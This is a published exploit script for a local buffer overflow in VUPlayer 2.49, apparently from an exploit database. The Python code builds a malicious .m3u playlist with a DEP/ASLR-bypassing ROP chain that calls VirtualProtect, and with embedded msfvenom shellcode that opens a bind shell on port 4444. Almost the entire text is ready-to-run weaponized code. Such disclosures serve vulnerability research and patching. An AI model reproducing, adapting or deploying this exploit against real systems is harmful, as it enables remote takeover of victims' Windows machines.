VUPlayer 2.49 .m3u Local Buffer Overflow

`# Exploit title: VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP,ASLR)  
# Date: 2020-05-22  
# Exploit Author: Gobinathan L  
# Vendor Homepage: http://www.vuplayer.com/  
# Version: v2.49  
# Tested on: Windows 7 Professional with ALSR and Full DEP Turned ON.  
  
# Usage : $ python <exploit>.py   
  
#===================================[ VUPlayer 2.49 Exploit Generator ]======================================#  
  
import struct  
  
# msfvenom -p windows/shell_bind_tcp exitfunc=thread -b "\x00\x0a\x0d\x1a" -f c  
shell = ("\xd9\xc9\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x53\xbd\xa9\xc1\xbf"  
"\xb1\x83\xc2\x04\x31\x6a\x13\x03\xc3\xd2\x5d\x44\xef\x3d\x23"  
"\xa7\x0f\xbe\x44\x21\xea\x8f\x44\x55\x7f\xbf\x74\x1d\x2d\x4c"  
"\xfe\x73\xc5\xc7\x72\x5c\xea\x60\x38\xba\xc5\x71\x11\xfe\x44"  
"\xf2\x68\xd3\xa6\xcb\xa2\x26\xa7\x0c\xde\xcb\xf5\xc5\x94\x7e"  
"\xe9\x62\xe0\x42\x82\x39\xe4\xc2\x77\x89\x07\xe2\x26\x81\x51"  
"\x24\xc9\x46\xea\x6d\xd1\x8b\xd7\x24\x6a\x7f\xa3\xb6\xba\xb1"  
"\x4c\x14\x83\x7d\xbf\x64\xc4\xba\x20\x13\x3c\xb9\xdd\x24\xfb"  
"\xc3\x39\xa0\x1f\x63\xc9\x12\xfb\x95\x1e\xc4\x88\x9a\xeb\x82"  
"\xd6\xbe\xea\x47\x6d\xba\x67\x66\xa1\x4a\x33\x4d\x65\x16\xe7"  
"\xec\x3c\xf2\x46\x10\x5e\x5d\x36\xb4\x15\x70\x23\xc5\x74\x1d"  
"\x80\xe4\x86\xdd\x8e\x7f\xf5\xef\x11\xd4\x91\x43\xd9\xf2\x66"  
"\xa3\xf0\x43\xf8\x5a\xfb\xb3\xd1\x98\xaf\xe3\x49\x08\xd0\x6f"  
"\x89\xb5\x05\x05\x81\x10\xf6\x38\x6c\xe2\xa6\xfc\xde\x8b\xac"  
"\xf2\x01\xab\xce\xd8\x2a\x44\x33\xe3\x45\xc9\xba\x05\x0f\xe1"  
"\xea\x9e\xa7\xc3\xc8\x16\x50\x3b\x3b\x0f\xf6\x74\x2d\x88\xf9"  
"\x84\x7b\xbe\x6d\x0f\x68\x7a\x8c\x10\xa5\x2a\xd9\x87\x33\xbb"  
"\xa8\x36\x43\x96\x5a\xda\xd6\x7d\x9a\x95\xca\x29\xcd\xf2\x3d"  
"\x20\x9b\xee\x64\x9a\xb9\xf2\xf1\xe5\x79\x29\xc2\xe8\x80\xbc"  
"\x7e\xcf\x92\x78\x7e\x4b\xc6\xd4\x29\x05\xb0\x92\x83\xe7\x6a"  
"\x4d\x7f\xae\xfa\x08\xb3\x71\x7c\x15\x9e\x07\x60\xa4\x77\x5e"  
"\x9f\x09\x10\x56\xd8\x77\x80\x99\x33\x3c\xa0\x7b\x91\x49\x49"  
"\x22\x70\xf0\x14\xd5\xaf\x37\x21\x56\x45\xc8\xd6\x46\x2c\xcd"  
"\x93\xc0\xdd\xbf\x8c\xa4\xe1\x6c\xac\xec")  
  
ret = struct.pack("<I", 0x10010158)  
  
def create_rop_chain():  
  
rop_gadgets = [  
0x100106e1, #POP EBP RET  
0x100106e1, #Ptr to POP EBP RET popped into EBP  
0x10015f82, #POP EAX RET  
0xfffffdff, #Value to Negate.. result in 0x201  
0x10014db4, #NEG EAX RET  
0x10032f72, #XCHG EAX, EBX RET  
0x10015f82, #POP EAX RET  
0xffffffc0, #Value to negate ..result in 0x40  
0x10014db4, #NEG EAX RET  
0x10038a6d, #XCHG EAX, EDX RET  
0x106053e5, #POP ECX RET   
0x101082cc, #Random Location with Write Access  
0x1001621c, #POP EDI RET  
0x10010158, #RET will be stored in EDI  
0x10604154, #POP ESI RET  
0x10101c02, #JMP [EAX]  
0x10015f77, # POP EAX # RETN [BASS.dll]   
0x10109270, # ptr to &VirtualProtect() [IAT BASSWMA.dll]  
0x1001d7a5, # PUSHAD # RETN  
0x10022aa7, # JMP ESP  
]  
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)  
  
rop_chain = create_rop_chain()  
shellcode = "\x90"*32 + shell  
  
  
buffer = "A"*1012  
buffer+= ret  
buffer+= rop_chain  
buffer+= shellcode  
buffer+= "\x90"*(2500 - len(buffer))  
  
try:  
f = open("exploit.m3u", "w")  
f.write(buffer)  
print("[+] Payload Generated Successfully.")  
print("[+] Check for Open Port [4444] on Target Machine. A Bind shell is waiting for you..")  
f.close()  
except:  
print("[-] Couldn't Generate Payload.")  
`